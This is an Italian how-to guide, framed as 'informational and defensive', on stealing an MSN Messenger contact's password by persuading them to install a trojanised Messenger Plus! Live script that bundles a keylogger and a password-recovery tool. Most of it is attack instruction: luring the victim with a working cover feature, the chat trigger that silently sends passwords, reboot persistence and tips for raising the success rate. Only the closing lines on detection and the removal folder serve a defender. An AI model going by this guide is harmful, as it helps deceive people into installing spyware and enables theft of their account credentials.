GUIDA A SCOPO INFORMATIVO E DIFENSIVO DA QUESTO SCRIPT...non lamerate
Oggi scriverò questa guida, del tutto a puro scopo informativo, dove è possibile scoprire la password di un contatto di MSN facendogli installare un semplice script per Messenger Plus! Live. Prima di tutto la vittima deve aver installato Messenger Plus! Live. Per capirlo basta chiederlo oppure vedere se ha il nickname colorato.
Ora resta che vi scaricate msgXs 1.5 da QUI(rapidshare by me il file è sicuro) e inviarlo alla vittima. Purtoppo il problema più grande e quello di far cascare la vittima ad aprirlo, e questo lo si può fare dicendogli che lo script ha una funziona vera. Lafunziona esiste davvero ed è quello di cambiare il Messaggio Personali direttamente da una Chat. I comandi di questa funziona sono:
!mp:[Messaggio nel PSM] = Con questo comando inserirete un nuovo Messaggio nel PSM di MSN. Al posto di [Messaggio nel PSM] dovete ovviamente scrivere la frase.
!mp:!mpm = Con questo comando potete modificare il vostro Messaggio personale.
Adesso invece vediamo i comandi per rubargli la Pass:
MSN aggiornato = E’ il comando con cui vi farete inviare le password all’insaputa dell’utente.
ciao-null- = Con questo invece gli farete cancellare la funziona di rubare la password. L’utente però dopo aver ricevuto questa scritta si deve disconettere da Messenger.
Lo script contiene 2 programmi principali:
MessenPass: il programma con cui ruberete le password memorizzate.
msgXs Keylogger: Il programma keylogger dove salverà le passwrod quando l’utente accederà ad MSN.
Quando la vittima avvierà lo script essa non potrà più cancellarlo perchè si riattiverà quando riavvia il sistema. Per rimuovere questo script allora bisogna andare nella cartella C:ProgrammiMessenger Plus! LiveScripts e cancellare la cartella msgXs. E’ consigliato inoltre che la vittima chiede e riapre Messenger per rubare le password giuste. Questo è consigliato perchè quando la vittima chiude e riapre MSN il keylogger si avvierà e quindi ci sono più possibilità di scoprire la password. Ovviamente questo metodo funziona 8 volte su 10 ma si può sempre sbagliare.
Per scoprire se vi stanno facendo un attacco simile a voi, e voi avete installato questo script, allora spunterà una finestrella a destra del desktop con la scritta: Errore di connessione, Riprova più tardi. Se la vittima ha versioni più vecchie della 8.5, può capitare che non funzioni.
